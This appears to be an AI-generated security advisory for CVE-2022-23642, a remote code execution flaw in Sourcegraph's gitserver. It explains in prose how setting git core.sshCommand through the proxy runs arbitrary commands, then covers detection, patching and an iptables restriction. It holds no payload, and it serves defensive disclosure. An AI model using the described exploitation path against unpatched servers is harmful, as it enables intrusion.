CVE-2022-23642 Overview
CVE-2022-23642 is a Remote Code Execution (RCE) vulnerability affecting Sourcegraph, a code search and navigation engine. The vulnerability exists in the gitserver service, which acts as a git exec proxy but fails to properly restrict calling git config. This flaw allows an attacker to set the git core.sshCommand option, which instructs git to use a specified command instead of ssh when connecting to remote systems, enabling arbitrary command execution.
Critical Impact
Remote attackers with the ability to make HTTP requests to internal services like gitserver can achieve remote code execution on affected Sourcegraph installations prior to version 3.37.
Affected Products
- Sourcegraph versions prior to 3.37
- Sourcegraph gitserver service component
Discovery Timeline
- February 18, 2022 - CVE-2022-23642 published to NVD
- November 21, 2024 - Last updated in NVD database
Technical Details for CVE-2022-23642
Vulnerability Analysis
The vulnerability stems from improper input validation (CWE-94) and missing authorization (CWE-862) in the Sourcegraph gitserver service. The service is designed to act as a proxy for executing git commands, but it lacks sufficient restrictions on which git operations can be invoked. Specifically, the service does not properly validate or sanitize requests that call git config, allowing attackers to manipulate git configuration settings.
The most critical exploitation path involves setting the core.sshCommand configuration option. When git needs to connect to a remote repository over SSH, it uses this configuration to determine which command to execute. By setting this option to a malicious payload, an attacker can execute arbitrary commands on the server whenever git attempts an SSH connection.
The exploitability of this vulnerability depends on the deployment architecture of Sourcegraph. In configurations where the gitserver service is accessible to attackers—either directly exposed or reachable through other compromised services—the vulnerability can be exploited remotely with low complexity and low privilege requirements.
Root Cause
The root cause of this vulnerability is insufficient input validation and missing authorization checks in the gitserver service. The service accepts requests to execute git commands without properly restricting which commands and options are allowed. This design flaw allows attackers to invoke git config commands that modify critical security-sensitive settings, such as core.sshCommand, which can be leveraged for command execution.
Attack Vector
The attack is network-based and requires the attacker to have the ability to send HTTP requests to the internal gitserver service. The exploitation follows this pattern:
- Attacker crafts an HTTP request to the gitserver service containing a git config command
- The malicious request sets core.sshCommand to point to an attacker-controlled command or script
- When git subsequently attempts to connect to a remote system via SSH, it executes the malicious command instead
- The attacker achieves arbitrary code execution in the context of the gitserver service
The vulnerability has been documented in public exploit databases. Technical details and proof-of-concept exploits are available through Packet Storm RCE Exploit and Packet Storm RCE via SSH Command.
Detection Methods for CVE-2022-23642
Indicators of Compromise
- Unexpected git config commands in gitserver service logs, particularly those setting core.sshCommand
- Anomalous HTTP requests targeting the gitserver service endpoint
- Unusual process spawning from git or gitserver processes
- Modified git configuration files containing suspicious sshCommand entries
Detection Strategies
- Monitor HTTP traffic to gitserver endpoints for requests containing git config commands
- Implement application-level logging to capture all git operations executed through the proxy
- Deploy network intrusion detection rules to identify exploitation attempts targeting Sourcegraph services
- Review system process trees for unexpected child processes spawned by git operations
Monitoring Recommendations
- Enable verbose logging for the gitserver service to capture all git command executions
- Implement network segmentation monitoring to detect unauthorized access to internal services
- Set up alerts for modifications to git configuration files across the Sourcegraph deployment
- Monitor for outbound connections from gitserver processes to unexpected destinations
How to Mitigate CVE-2022-23642
Immediate Actions Required
- Upgrade Sourcegraph to version 3.37 or later immediately
- Restrict network access to the gitserver service to only authorized internal components
- Review logs for signs of exploitation attempts or successful compromise
- Implement network segmentation to isolate internal Sourcegraph services from untrusted networks
Patch Information
Sourcegraph has released version 3.37 which addresses this vulnerability. The fix is documented in GitHub Pull Request #30833. Organizations should upgrade to the patched version as soon as possible. For detailed information about the security fix, refer to GitHub Security Advisory GHSA-qcmp-fx72-q8q9.
Workarounds
- Ensure that HTTP requests to gitserver are properly protected and only accessible from trusted internal services
- Implement network-level access controls (firewall rules, security groups) to restrict access to the gitserver service
- Deploy a web application firewall or reverse proxy to filter malicious requests before they reach gitserver
- Consider temporarily disabling external repository synchronization if upgrade is not immediately possible
# Network access restriction example (iptables)
# Restrict gitserver access to only the main Sourcegraph frontend
iptables -A INPUT -p tcp --dport 3178 -s <frontend_ip> -j ACCEPT
iptables -A INPUT -p tcp --dport 3178 -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
